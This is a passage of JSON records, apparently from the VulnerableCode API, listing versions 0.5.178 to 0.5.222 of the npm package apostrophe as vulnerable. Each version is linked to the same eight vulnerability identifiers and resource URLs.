-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.178"},{"url":"http://public2.vulnerablecode.io/api/packages/268263?format=json","purl":"pkg:npm/apostrophe@0.5.179","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.179"},{"url":"http://public2.vulnerablecode.io/api/packages/268264?format=json","purl":"pkg:npm/apostrophe@0.5.181","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.181"},{"url":"http://public2.vulnerablecode.io/api/packages/268265?format=json","purl":"pkg:npm/apostrophe@0.5.182","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.182"},{"url":"http://public2.vulnerablecode.io/api/packages/268266?format=json","purl":"pkg:npm/apostrophe@0.5.183","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.183"},{"url":"http://public2.vulnerablecode.io/api/packages/268267?format=json","purl":"pkg:npm/apostrophe@0.5.184","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.184"},{"url":"http://public2.vulnerablecode.io/api/packages/268268?format=json","purl":"pkg:npm/apostrophe@0.5.185","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.185"},{"url":"http://public2.vulnerablecode.io/api/packages/268269?format=json","purl":"pkg:npm/apostrophe@0.5.186","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.186"},{"url":"http://public2.vulnerablecode.io/api/packages/268270?format=json","purl":"pkg:npm/apostrophe@0.5.187","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.187"},{"url":"http://public2.vulnerablecode.io/api/packages/268271?format=json","purl":"pkg:npm/apostrophe@0.5.188","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.188"},{"url":"http://public2.vulnerablecode.io/api/packages/268272?format=json","purl":"pkg:npm/apostrophe@0.5.189","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.189"},{"url":"http://public2.vulnerablecode.io/api/packages/268273?format=json","purl":"pkg:npm/apostrophe@0.5.190","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.190"},{"url":"http://public2.vulnerablecode.io/api/packages/268274?format=json","purl":"pkg:npm/apostrophe@0.5.191","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.191"},{"url":"http://public2.vulnerablecode.io/api/packages/268275?format=json","purl":"pkg:npm/apostrophe@0.5.192","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.192"},{"url":"http://public2.vulnerablecode.io/api/packages/268276?format=json","purl":"pkg:npm/apostrophe@0.5.193","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.193"},{"url":"http://public2.vulnerablecode.io/api/packages/268277?format=json","purl":"pkg:npm/apostrophe@0.5.194","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.194"},{"url":"http://public2.vulnerablecode.io/api/packages/268278?format=json","purl":"pkg:npm/apostrophe@0.5.195","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.195"},{"url":"http://public2.vulnerablecode.io/api/packages/268279?format=json","purl":"pkg:npm/apostrophe@0.5.196","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.196"},{"url":"http://public2.vulnerablecode.io/api/packages/268280?format=json","purl":"pkg:npm/apostrophe@0.5.197","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.197"},{"url":"http://public2.vulnerablecode.io/api/packages/268281?format=json","purl":"pkg:npm/apostrophe@0.5.198","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.198"},{"url":"http://public2.vulnerablecode.io/api/packages/268282?format=json","purl":"pkg:npm/apostrophe@0.5.199","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.199"},{"url":"http://public2.vulnerablecode.io/api/packages/268283?format=json","purl":"pkg:npm/apostrophe@0.5.200","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.200"},{"url":"http://public2.vulnerablecode.io/api/packages/268284?format=json","purl":"pkg:npm/apostrophe@0.5.201","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.201"},{"url":"http://public2.vulnerablecode.io/api/packages/268285?format=json","purl":"pkg:npm/apostrophe@0.5.202","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.202"},{"url":"http://public2.vulnerablecode.io/api/packages/268286?format=json","purl":"pkg:npm/apostrophe@0.5.203","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.203"},{"url":"http://public2.vulnerablecode.io/api/packages/268287?format=json","purl":"pkg:npm/apostrophe@0.5.204","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.204"},{"url":"http://public2.vulnerablecode.io/api/packages/268288?format=json","purl":"pkg:npm/apostrophe@0.5.205","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.205"},{"url":"http://public2.vulnerablecode.io/api/packages/268289?format=json","purl":"pkg:npm/apostrophe@0.5.206","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.206"},{"url":"http://public2.vulnerablecode.io/api/packages/268290?format=json","purl":"pkg:npm/apostrophe@0.5.207","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.207"},{"url":"http://public2.vulnerablecode.io/api/packages/268291?format=json","purl":"pkg:npm/apostrophe@0.5.208","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.208"},{"url":"http://public2.vulnerablecode.io/api/packages/268292?format=json","purl":"pkg:npm/apostrophe@0.5.209","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.209"},{"url":"http://public2.vulnerablecode.io/api/packages/268293?format=json","purl":"pkg:npm/apostrophe@0.5.210","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.210"},{"url":"http://public2.vulnerablecode.io/api/packages/268294?format=json","purl":"pkg:npm/apostrophe@0.5.211","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.211"},{"url":"http://public2.vulnerablecode.io/api/packages/268295?format=json","purl":"pkg:npm/apostrophe@0.5.212","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.212"},{"url":"http://public2.vulnerablecode.io/api/packages/268296?format=json","purl":"pkg:npm/apostrophe@0.5.213","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.213"},{"url":"http://public2.vulnerablecode.io/api/packages/268297?format=json","purl":"pkg:npm/apostrophe@0.5.214","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.214"},{"url":"http://public2.vulnerablecode.io/api/packages/268298?format=json","purl":"pkg:npm/apostrophe@0.5.215","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.215"},{"url":"http://public2.vulnerablecode.io/api/packages/268299?format=json","purl":"pkg:npm/apostrophe@0.5.216","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.216"},{"url":"http://public2.vulnerablecode.io/api/packages/268300?format=json","purl":"pkg:npm/apostrophe@0.5.217","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.217"},{"url":"http://public2.vulnerablecode.io/api/packages/268301?format=json","purl":"pkg:npm/apostrophe@0.5.218","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.218"},{"url":"http://public2.vulnerablecode.io/api/packages/268302?format=json","purl":"pkg:npm/apostrophe@0.5.219","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.219"},{"url":"http://public2.vulnerablecode.io/api/packages/268303?format=json","purl":"pkg:npm/apostrophe@0.5.220","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.220"},{"url":"http://public2.vulnerablecode.io/api/packages/268304?format=json","purl":"pkg:npm/apostrophe@0.5.221","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.221"},{"url":"http://public2.vulnerablecode.io/api/packages/268305?format=json","purl":"pkg:npm/apostrophe@0.5.222","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_u